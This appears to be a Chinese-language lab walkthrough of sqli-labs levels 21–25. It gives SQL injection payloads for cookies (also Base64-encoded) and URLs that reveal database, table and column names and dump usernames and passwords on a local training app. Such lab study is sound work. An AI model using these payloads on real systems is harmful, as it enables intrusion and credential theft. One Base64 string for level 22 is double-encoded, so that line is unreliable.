第二一关 less-21
步骤一:输入Username:admin Password:admin 利用Burpsutie进行抓包
步骤二:在Cookie后输入'报错,判断闭合方式为') #
对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode
步骤三:判断列数
') order by 4 # => Jykgb3JkZXIgYnkgNCAj
') order by 3 # => Jykgb3JkZXIgYnkgMyAj
列数为三
步骤四:查询回显点
') union select 1,2,3 # => JykgdW5pb24gc2VsZWN0IDEsMiwzICM=
步骤五:查询数据库
') union select 1,2,database() # => JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM=
步骤六:查表名
代码:') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
转换码:JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=
步骤七:查列名
代码:') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
转换码:
JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgYW5kIHRhYmxlX25hbWU9J3VzZXJzJyAj
步骤八:查询表中所有数据
代码:') union select 1,2,group_concat(id,username,password) from users #
转换码:JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMgIw==
第二二关 less-22
步骤一:输入Username:admin Password:admin 利用Burpsutie进行抓包
步骤二:在Cookie后输入'报错,判断闭合方式为" #
对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode
步骤三:判断列数
" order by 4 # => IiBvcmRlciBieSA0ICM=
" order by 3 # => IiBvcmRlciBieSAzICM=
列数为三
步骤四:查询回显点
" union select 1,2,3 # => IiB1bmlvbiBzZWxlY3QgMSwyLDMgIw==
步骤五:查询数据库
" union select 1,2,database() # => IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkgIw==
步骤六:查表名
代码:" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
转换码:IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==
步骤七:查列名
代码:" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
转换码:
SWlCMWJtbHZiaUJ6Wld4bFkzUWdNU3huY205MWNGOWpiMjVqWVhRb1kyOXNkVzF1WDI1aGJXVXBMRE1nWm5KdmJTQnBibVp2Y20xaGRHbHZibDl6WTJobGJXRXVZMjlzZFcxdWN5QjNhR1Z5WlNCMFlXSnNaVjl6WTJobGJXRTlKM05sWTNWeWFYUjVKeUJoYm1RZ2RHRmliR1ZmYm1GdFpUMG5kWE5sY25NbklDTT0=
步骤八:查询表中所有数据
代码:" union select 1,2,group_concat(id,username,password) from users #
转换码:IiB1bmlvbiBzZWxlY3QgMSwyLGdyb3VwX2NvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZCkgZnJvbSB1c2VycyAj
第二三关 less-23
步骤一:用?id=1 --+有数据
用?id=1 #有数据
发现--+和#过滤
步骤二:判断闭合方式:?id=1' and ' 1 ' =' 1
步骤三:查询回显参数
http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,2,3%20and%20%27%201%20%27%20=%27%201
步骤四:查询数据库
步骤五:查表名
步骤六:查列名
第二四关 less-24
步骤一:注册新用户
步骤二:登录->修改密码
修改成功
第二五关 less-25
步骤一:or 和and 被过滤
利用联合查询闭合方式为id=1' --+
步骤二:查回显参数
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,2,3%20--+
步骤三:查询数据库
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,database(),3%20--+
步骤四:查表名
步骤五:查列名
步骤六:查所有数据
